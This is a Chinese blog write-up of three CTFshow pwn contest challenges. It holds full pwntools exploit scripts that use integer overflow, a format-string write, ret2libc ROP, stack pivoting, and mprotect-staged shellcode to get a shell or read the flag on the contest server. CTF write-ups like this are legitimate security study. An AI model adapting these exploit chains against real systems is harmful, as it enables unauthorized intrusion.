CTFshow 摆烂杯 pwn

最新推荐文章于 2024-07-21 12:06:59 发布
最新推荐文章于 2024-07-21 12:06:59 发布
阅读量3.1k 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SCP000111/article/details/122165334
版权

CTFshow 摆烂杯 pwn

啊啊啊,看着官方脚本调了好久终于调通,为了防止后来的兄弟耽误时间,发个博客。

官方wp

dota

这道题还是很简单的,整型溢出+格式化字符串+ROP,可惜当时只做出这一道题

#!/usr/bin/env python
# encoding: utf-8

from pwn import*
from LibcSearcher import *
context.log_level = "debug"
p = remote('pwn.challenge.ctf.show',28187)
#p = process('./dota.dota')
elf = ELF('./dota.dota')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.sym['main']
pop_rdi=0x0004009b3
pop_ret=0x04005ce
def pwn():
    p.recvuntil('------\n')
    p.sendline('dota')
    p.recvuntil('------\n')
    p.sendline('2147483648')
#print(p.recv(0x170,1))
    p.recvlines(9)
#print(1)
    bss_addr =p.recvuntil('\n')[:-1].ljust(8,'\x00')#ok
#bss_addr=hex(int(bss_addr,16))
    #print(p.pid)
    #raw_input('pause')
#print(type(int(bss_addr,16)))
    payload='%25c%9$n'+p64(int(bss_addr,16))
    p.sendline(payload)


pwn()
payload='a'*128+'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)

p.recvuntil('\x0a')

p.sendline(payload)

#p.recvuntil('\x0a')
#puts_addr = u64(p.recv(6).ljust(8, '\x00'))#ok
#puts_addr = u64(r.recv(7).ljust(8, '\x00'))#?
#puts_addr = u64(r.recvuntil('\n')[:-1].ljust(8,'\x00'))#?
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))#ok


print('puts_addr=',hex(puts_addr))

libc=LibcSearcher('puts',puts_addr)#libcsearcher
libcbase=puts_addr-libc.dump('puts')
system_addr=libcbase+libc.dump('system')
bin_sh_addr=libcbase+libc.dump('str_bin_sh')

pwn()
#payload='a'*128+'a'*8+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)
payload='a'*128+'a'*8+p64(pop_ret)+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)#这个pop_ret是栈对齐的东西
p.recvuntil('\x0a')

p.sendline(payload)
p.interactive()

CET4

当时比赛的时候就卡到这道题了,不知道为啥,经典ROP没有效果,栈对齐也对齐了,gdb读的时候发现有个地方直接卡住了,然后就卡在这里了(太菜了太菜了),赛后复现,看他的wp,发现他没有用system,可能是system有什么问题吧。是写的bss段。

'''
from pwn import *
from LibcSearcher import *
context.log_level='debug'
r=remote('pwn.challenge.ctf.show',28060)
#r=process('./CET4')
#r.recvuntil('name:\n')
#r.sendline(p64(1))
#r.recvuntil('???\n')
#print(r.pid)
#raw_input('pause')

elf = ELF('./CET4')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.sym['main']
pop_rdi=0x04013d3
pop_ret=0x040101a
r.recvuntil('name:\n')
r.send(p64(1))
#print(r.pid)
#raw_input('pause')

r.recvline(2)
#print(r.pid)
#raw_input('pause')
payload='a'*0x48+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
#print(payload)
r.sendline(payload)
#print(r.pid)
#raw_input('pause')
#r.recvuntil('\x0a')
#puts_addr = u64(r.recv(6).ljust(8, '\x00'))#ok
#puts_addr = u64(r.recv(7).ljust(8, '\x00'))#?
#puts_addr = u64(r.recvuntil('\n')[:-1].ljust(8,'\x00'))#?
puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00'))#ok


print(hex(puts_addr))

libc=LibcSearcher('puts',puts_addr)#libcsearcher
libcbase=puts_addr-libc.dump('puts')
system_addr=libcbase+libc.dump('system')
bin_sh_addr=libcbase+libc.dump('str_bin_sh')
exit=libcbase+libc.dump('exit')


libc_puts=0x0809c0
libc_sys=0x04f440
libc_bin=0x1b3e9a
offset = puts_addr - libc_puts#libcsearcher无法使用时
system_addr=offset+ libc_sys
bin_sh_addr=offset+ libc_bin

r.recvuntil('name:\n')
r.send(p64(1))
r.recvuntil('???\n')
#print(r.pid)
#raw_input('pause')

#payload='a'*(0x40-8)+p64(1)+'a'*8+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)
payload='a'*0x48+p64(pop_ret)+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)+p64(exit)#这个pop_ret是栈对齐的东西
r.sendline(payload)
r.interactive()
'''#这都是我以前的思路

from pwn import *
from LibcSearcher import *
p=remote('pwn.challenge.ctf.show',28060)
#p=process('./CET4')
elf=ELF("./CET4")

#libc=elf.libc
context.log_level='debug'
context.arch='amd64'

rdi=0x00000000004013d3
bss=0x404000
main=elf.sym['main']

p.sendafter('your name:\n','a'*4+p32(0))
#gdb.attach(p)
p.sendafter('QAQ:How was your test???','a'*0x48+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main))

#libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-libc.sym['puts']
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))#ok
print(hex(puts_addr))

libc=LibcSearcher('puts',puts_addr)#libcsearcher
libcbase=puts_addr-libc.dump('puts')
#system_addr=libcbase+libc.dump('system')
#bin_sh_addr=libcbase+libc.dump('str_bin_sh')

#success('libc_base:'+hex(libc_base))


rsi=0x0000000000002709c+libcbase
rdx_r12=0x000000000011c421+libcbase
rdx_rsi=0x0130569+libcbase
p.sendafter('your name:\n','a'*4+p32(0))

protect=libcbase+libc.dump('mprotect')

rsi_r15=0x04013d1
mov_rdx_r14=0x0004013B0
r14_r15=0x4013d0
payload=p64(rdi)+p64(0x404000)+p64(rsi)+p64(0x1000)+p64(rdx_r12)+p64(7)+p64(0)+p64(protect)+p64(main)
#payload=p64(rdi)+p64(0x404000)+p64(rsi_r15)+p64(0x1000)+p64(0)+p64(r14_r15)+p64(7)+p64(0)+p64(mov_rdx_r14)+p64(protect)+p64(main)
#payload=p64(rdi)+p64(0x404000)+p64(rdx_rsi)+p64(7)+p64(0x100)+p64(protect)+p64(main)
#print(p.pid)
#pause()
p.sendafter('QAQ:How was your test???','a'*0x48+payload)
#p.recvuntil('???\n')
#p.sendline(payload)
p.sendafter('your name:\n','a'*4+p32(0))

read=libcbase+libc.dump('read')

payload=p64(rdi)+p64(0)+p64(rsi)+p64(0x404500)+p64(rdx_r12)+p64(0x100)+p64(0)+p64(read)+p64(0x404500)
#payload=p64(rdi)+p64(0)+p64(rdx_rsi)+p64(0x100)+p64(0x404000)+p64(read)+p64(0x404000)
p.sendafter('QAQ:How was your test???','a'*0x48+payload)

code = shellcraft.open("./flag")
code += shellcraft.read(3, 0x404900, 0x50)
code += shellcraft.write(1, 0x404900, 0x50)
shellcode = asm(code)
#shellcode = asm(shellcraft.sh())
#pause()
p.sendline(shellcode)

p.interactive()

当时卡住的重点就在于
在这里插入图片描述
当时我不知道这个是那里的东西。
下面就写下我解出来的过程
在这里插入图片描述
根据我的代码,你可以得到puts的地址,根据后三位到网站上去下载
在这里插入图片描述
综合Libcsearcher的消息,下载最有可能的libc文件
在这里插入图片描述
然后一个一个试,一个一个填
在这里插入图片描述
最后试出来是libc6_2.30-0ubuntu2_amd64.so这个libc
然后就通了
在这里插入图片描述
过程中想了好久,做了半天才搞通这四级与六级5555

CET6

from pwn import *
from LibcSearcher import *

p = remote('pwn.challenge.ctf.show',28191)
#p=process('./CET6')
elf=ELF("./CET6")

libc=elf.libc
context.log_level='debug'
context.arch='amd64'

rdi=0x00000000004012f3

p.sendafter('your name:\n','\x00'*0x8)

p.sendafter('QAQ:How was your test???','a'*0x40+p64(0x404F00)+p64(0x4011ae))
#pause()
p.send('a'*0x40+p64(0x404F40)+p64(0x4011ae))
#pause()
p.send('a'*8+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x4011ae))
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))#ok


print(hex(puts_addr))

libc=LibcSearcher('puts',puts_addr)#libcsearcher
libcbase=puts_addr-libc.dump('puts')
system_addr=libcbase+libc.dump('system')
bin_sh_addr=libcbase+libc.dump('str_bin_sh')



p.send('c'*0x20+p64(rdi)+p64(bin_sh_addr)+p64(system_addr))

p.interactive()

根据wp改下就行了,当时的思路是one_gadet

上述代码如果有更简单的兄弟,或者说system跑通了,一起交流呀。

Steins;G4te
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
信息安全铁人三项赛真题解析_信息安全铁人三项赛二进制部分题解
weixin_29563497的博客
12-30 604
2018-2019赛季little notechecksecmenu()main()增、删、查四个功能,并且保护基本全开。add()这里需要注意的就是,至多0xF个note并且大小固定0x60,创建完成后会问是否保留,若不保留的话会free掉当前note并创建一个0x20的备份。show()free()freenote()有个UAF。利用思路:这里有个很巧妙的方法,就是第一次利用UAF leak出...
ctfshow杯 比为主】
chuxuezhewocao的博客
06-02 931
ctfshow杯 比为主
canary保护和pie保护的绕过
2301_79880074的博客
01-27 1646
今天通过三道例题学习一下开启canary,pie保护的解题方法。
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 3296
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
ctfshow pwn 2/100
m0_57754423的博客
02-22 3177
dota: 考点: 整数溢出 ret2libc exp: from pwn import * # p = process("./dota") p = remote("pwn.challenge.ctf.show",28127) e = ELF("./dota") p.timeout = 0.5 context.log_level = 'debug' libc = e.libc p.recvuntil("--------\n") p.recvuntil("--------\n") p.sendline("
ctfshow 杯 writeup
mumuzi的博客
12-26 3608
ctfshow杯 writeup
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
强网杯2022 pwn 赛题解析.docx
12-18
【强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
2017湖湘杯pwn100的题目
11-30
2017湖湘杯pwn100的题目的二进制文件和libc的二进制文件
2020网鼎杯.zip
07-20
【网鼎杯】是一项旨在提升网络安全能力的比赛,它涵盖了多种网络安全技术,如逆向工程(Reverse Engineering)、pwn(破解)以及密码学等。 【逆向工程】是一种技术,它涉及分析软件或硬件的功能,以了解其工作原理...
ctfshow刷题记录6(sql注入1)
qq_61109509的博客
02-23 2998
有点杂。。。sql注入web171-173web174解法一 用replacet套娃解法二,布尔盲注脚本web 175解法一 时间盲注脚本解法二 利用读写文件写入网站根目录web176 大小写过滤解法一 万能密码出结果解法二 大小写过滤web177web178web179 sql注入 web171-173 六件套往上呼 1’ order by 3 – - 1’ union select 1,2,database() – - (无法用#进行注释,先用-- -) 爆列名:1’union selec
ctfshow 内部赛 pwn 签到题
SCP000111的博客
11-16 1621
ctfshow 内部赛 pwn 签到题 找了在刷题的中,不会做这道题,找了好久没找到wp,搞了几天,还怀疑题目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。 先放图片,2021.11.16该代码可行 这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的题目似乎与这道题一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
粉尘传感器助力面粉厂安全生产
iotsensor的博客
07-19 597
OPC-R2有16个大小的垃圾箱,可以每秒记录PM1、PM2.5和PM10以及大小直方图,这在应用程序需要的不仅仅是PM时至关重要。OPC-R2取代了OPC-R1,带来了比其前身更好的小颗粒检测、更低的风扇噪声和更好的EMC保护。因此,如何有效监测和控制面粉厂的粉尘浓度,成为了保障安全生产的关键。这种传感器能够实时、准确地监测空气中的粉尘浓度,并将数据反馈给控制系统,从而实现对粉尘浓度的有效控制。通过实时监测和控制粉尘浓度,可以有效保障工作人员的健康、设备的安全运行以及环境的保护。
【ROS2】高级:安全-部署指南
最新发布
cxyhjl的博客
07-21 355
目标:了解将安全工件部署到生产系统时的最佳实践。教程级别:高级时间:20 分钟内容背景先决条件一般准则构建部署场景生成 Docker 镜像理解 compose 文件运行示例检查容器背景典型的部署场景通常涉及将容器化的应用程序或软件包发送到远程系统。在部署启用安全性的应用程序时应特别注意,要求用户考虑打包文件的敏感性。遵循 DDS 安全标准 https://www.omg.org/s...
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
Thewei666的博客
07-17 1212
区分不同的签名。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 490
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 622
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 865
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
ctfshow pwn
08-07
你想了解关于 CTFShow Pwn 的信息吗?CTFShow 是一个国内知名的CTF比赛平台,Pwn 则是其中的一个攻防领域,主要涉及利用漏洞进行系统攻击和控制的技术。在 CTFShow Pwn 中,参赛选手需要通过分析二进制程序的漏洞,利用它们来获取系统控制权,并完成指定的任务。这个领域需要对二进制程序分析、漏洞挖掘、堆栈溢出、ROP链构造等技术有一定的了解和实践经验。如果你对具体的题目或技术有更具体的问题,我可以帮你进一步解答。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Steins;G4te

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值